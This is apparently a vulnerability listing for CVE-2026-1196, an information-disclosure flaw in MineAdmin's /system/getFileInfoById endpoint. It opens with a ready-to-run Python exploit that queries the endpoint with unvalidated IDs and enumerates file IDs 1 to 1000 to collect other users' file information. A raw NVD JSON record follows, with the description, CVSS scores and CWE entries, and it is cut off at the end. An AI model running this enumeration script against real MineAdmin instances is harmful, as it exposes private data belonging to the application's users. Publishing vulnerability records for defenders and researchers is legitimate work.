CVE-2026-1196

# CVE-2026-1196 PoC - MineAdmin Information Disclosure # Target: MineAdmin 1.x/2.x # Endpoint: /system/getFileInfoById import requests import json TARGET_URL = "http://target-website.com" # Replace with actual target API_ENDPOINT = "/system/getFileInfoById" def exploit_cve_2026_1196(target_url, file_id): """ Exploit for CVE-2026-1196 Information Disclosure vulnerability in MineAdmin /system/getFileInfoById endpoint Args: target_url: Base URL of the vulnerable MineAdmin instance file_id: Integer ID of the file to retrieve info (can be enumerated) Returns: dict: Response containing file information if vulnerable """ # Construct the vulnerable endpoint url = f"{target_url}{API_ENDPOINT}" # Prepare request parameters params = { "id": file_id # Unvalidated ID parameter } # Headers (may require basic authentication) headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" } try: # Send GET request to vulnerable endpoint response = requests.get(url, params=params, headers=headers, timeout=10) if response.status_code == 200: data = response.json() # Check if sensitive information is leaked if "data" in data or "file_path" in data or "path" in data: print(f"[!] Vulnerability confirmed! File ID: {file_id}") print(f"[+] Leaked information: {json.dumps(data, indent=2)}") return data else: print(f"[*] No sensitive data for File ID: {file_id}") return None else: print(f"[*] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[!] Request error: {e}") return None def enumerate_files(start_id=1, end_id=1000): """ Enumerate file IDs to discover other users' files """ leaked_files = [] print(f"[*] Starting enumeration from ID {start_id} to {end_id}") for file_id in range(start_id, end_id + 1): result = exploit_cve_2026_1196(TARGET_URL, file_id) if result: leaked_files.append({"id": file_id, "data": result}) print(f"\n[+] Total leaked files: {len(leaked_files)}") return leaked_files if __name__ == "__main__": # Single file test print("[*] Testing single file ID...") exploit_cve_2026_1196(TARGET_URL, 1) # Or run enumeration # enumerate_files(1, 100)

{"cve": {"id": "CVE-2026-1196", "sourceIdentifier": "[email protected]", "published": "2026-01-20T01:15:56.443", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in MineAdmin 1.x/2.x. Affected is an unknown function of the file /system/getFileInfoById. Such manipulation of the argument ID leads to information disclosure. It is possible to launch the attack remotely. The attack requires a high level of complexity. The exploitability is told to be difficult. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Una vulnerabilidad de seguridad ha sido detectada en MineAdmin 1.x/2.x. Afectada es una función desconocida del archivo /system/getFileInfoById. Tal manipulación del argumento ID conduce a revelación de información. Es posible lanzar el ataque remotamente. El ataque requiere un alto nivel de complejidad. La explotabilidad se dice que es difícil. El exploit ha sido revelado públicamente y puede ser usado. El proveedor fue contactado tempranamente sobre esta revelación pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:H/Au:S/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "NETWORK", "accessComplexity": "HIGH", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2A167C8E-5C7F-4192-8DD0-01444D06C9CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mineadmin:mineadmin:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EED883D-2F40-4DE0-8816-8495146E06B6"}]}]}], "references": [{"url": "https://github.com/SourByte05/MineAdmin-Vulnerability/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Mitigation", " ... (truncated)